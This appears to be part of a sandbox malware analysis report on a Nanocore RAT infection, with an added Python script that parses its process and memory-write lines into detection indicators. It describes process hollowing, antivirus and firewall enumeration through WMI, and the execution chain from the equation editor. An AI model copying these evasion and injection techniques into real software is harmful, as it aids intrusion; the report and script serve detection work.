Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
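
The evidence lines above give the whole execution chain: EQNEDT32.EXE launches vbc.exe from C:\Users\Public, vbc.exe runs sys30.exe from a fresh directory under AppData\Local, sys30.exe starts a second copy of itself and writes a PE image (bytes 4D 5A, "MZ") into it at base 0x70000, and sys30.exe then launches sys30s.exe over and over. The Python below is an added example and not part of the Joe Sandbox report: it turns "Process created" and "Memory written" evidence lines into a parent-to-child tree and extracts the three facts a detection rule would key on: an Office helper starting code from a user-writable directory, a PE header written into another process, and repeated relaunches of the same child. The sample lines are copied from the report; the Office helper name set and the directory-prefix list are this example's own assumptions.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple, Tuple

PROC_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<child>\S+)")
MEMWRITE_RE = re.compile(
    r"^Source: (?P<writer>.+?) Memory written: (?P<target>.+?) "
    r"base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<magic>[0-9A-Fa-f]+)"
)

# Assumptions of this example: which image counts as "the Office helper", and which
# directory prefixes count as user-writable drop locations (the report uses both).
OFFICE_HELPERS = {"eqnedt32.exe"}
USER_WRITABLE_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(lines) -> Dict[str, Counter]:
    """parent image -> Counter of child images; repeated launches are counted, not collapsed."""
    tree: Dict[str, Counter] = defaultdict(Counter)
    for line in lines:
        m = PROC_RE.match(line.strip())
        if m:
            tree[m.group("parent")][m.group("child")] += 1
    return tree


def office_spawns_from_user_dirs(tree) -> List[Tuple[str, str, int]]:
    """(parent, child, count) where an Office helper started a binary from a user-writable path."""
    return [
        (parent, child, n)
        for parent, children in tree.items() if basename(parent) in OFFICE_HELPERS
        for child, n in children.items()
        if any(d in child.lower() for d in USER_WRITABLE_DIRS)
    ]


def repeated_launches(tree, min_count: int = 2) -> List[Tuple[str, str, int]]:
    """(parent, child, count) pairs launched at least min_count times (respawn / watchdog loops)."""
    return [(p, c, n) for p, ch in tree.items() for c, n in ch.items() if n >= min_count]


class MemWrite(NamedTuple):
    writer: str
    target: str
    base: int
    same_image: bool  # target is another instance of the writer's own image (a suspended child)


def pe_injections(lines) -> List[MemWrite]:
    """Memory writes whose first bytes are the PE magic 'MZ' (4D 5A): an image being placed
    into another process, as opposed to a small stub or a patched pointer."""
    out = []
    for line in lines:
        m = MEMWRITE_RE.match(line.strip())
        if m and m.group("magic").upper().startswith("4D5A"):
            out.append(MemWrite(
                m.group("writer"), m.group("target"), int(m.group("base"), 16),
                m.group("writer") == m.group("target"),
            ))
    return out


# Copied from the report's "Injects a PE file" and "Creates a process in suspended mode" lines.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Memory written: C:\Users\user\AppData\Local\sys4h57g\sys30.exe base: 70000 value starts with: 4D5A",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'",
    r"Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'",
    r"Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe",
    r"Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'",
    r"Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'",
    r"Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'",
]

if __name__ == "__main__":
    tree = build_tree(SAMPLE_LINES)
    for parent, children in tree.items():
        for child, n in children.items():
            print(f"{basename(parent)} -> {basename(child)} x{n}")
    print("office spawns:", office_spawns_from_user_dirs(tree))
    print("repeated:", repeated_launches(tree))
    for w in pe_injections(SAMPLE_LINES):
        print(f"PE written by {basename(w.writer)} into {basename(w.target)} at 0x{w.base:X} (same image: {w.same_image})")
```

The same-image write into a child that was created suspended is the hollowing pattern the "Creates a process in suspended mode" signature anticipates; on a live host the equivalent telemetry is a Sysmon CreateRemoteThread / process access event pairing the two PIDs, which this report only shows at image-path granularity.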

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Queries volume information: C:\Users\user\AppData\Local\sys4h57g\sys30.exe VolumeInformation
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Queries volume information: C:\Users\user\AppData\Local\sys4h57g\sys30.exe VolumeInformation
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Queries volume information: C:\Users\user\AppData\Local\sys4h57g\sys30.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062C010 GetSystemTimes, 9_2_0062C010

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Nanocore RAT
Source: Yara match File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat
Source: sys30.exe, 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Yara detected Nanocore RAT
Source: Yara match File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR